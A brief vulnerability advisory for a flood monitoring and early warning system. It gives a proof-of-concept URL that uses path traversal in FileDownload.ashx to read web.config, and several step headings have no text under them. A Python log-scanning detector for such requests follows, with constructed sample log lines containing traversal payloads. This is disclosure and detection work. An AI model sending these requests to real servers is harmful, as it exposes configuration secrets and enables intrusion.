Flash flood disaster monitoring and early warning system 2.0 has an arbitrary file read vulnerability
Official website: http://www.cdwanjiang.com/
Vulnerability location: \Service\FileDownload.ashx
Tracing the handler to its class:
\bin\MFCW.Web.dll // MFCW.Web.Service.FileDownload
Enter the Download function:
Enter the ResponseFile function:
POC:
http://xx.xx.xx.xx/Service/FileDownload.ashx?Files=../../web.config&FileSaveName=web
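
Detection example (added here, not part of the original advisory or the vendor's code): it scans web server access log lines for requests to /Service/FileDownload.ashx whose Files parameter decodes to a ".." path segment, a rooted path or a drive letter, as in the POC above. The log lines are constructed, and the W3C-style field layout and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

HANDLER = "/service/filedownload.ashx"  # handler path from the advisory, lowercased
# A ".." path segment, a rooted path, or a drive letter in the Files value.
SUSPICIOUS = re.compile(r"(^|[\\/])\.\.([\\/]|$)|^[\\/]|^[a-zA-Z]:")

def decode_fully(value, rounds=3):
    """Undo nested URL encoding (e.g. %252e%252e), at most `rounds` passes."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def files_param_is_suspicious(url):
    """True if url hits the handler with a Files value that leaves the download directory."""
    parts = urlsplit(url)
    if decode_fully(parts.path).lower().rstrip("/") != HANDLER:
        return False
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() == "files" and SUSPICIOUS.search(decode_fully(value)):
            return True
    return False

def scan(log_lines):
    """Return (client_ip, url) per suspicious request. Assumed field layout:
    date time c-ip cs-method cs-uri-stem cs-uri-query sc-status"""
    hits = []
    for line in log_lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue  # skip log directives and malformed lines
        ip, stem, query = fields[2], fields[4], fields[5]
        url = stem if query == "-" else f"{stem}?{query}"
        if files_param_is_suspicious(url):
            hits.append((ip, url))
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2024-01-01 10:00:00 192.0.2.10 GET /Service/FileDownload.ashx Files=report.pdf&FileSaveName=report 200",
    "2024-01-01 10:00:05 198.51.100.7 GET /Service/FileDownload.ashx Files=../../web.config&FileSaveName=web 200",
    "2024-01-01 10:00:09 198.51.100.7 GET /Service/FileDownload.ashx Files=%252e%252e%255cweb.config&FileSaveName=w 200",
    "2024-01-01 10:00:12 192.0.2.10 GET /index.aspx - 200",
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```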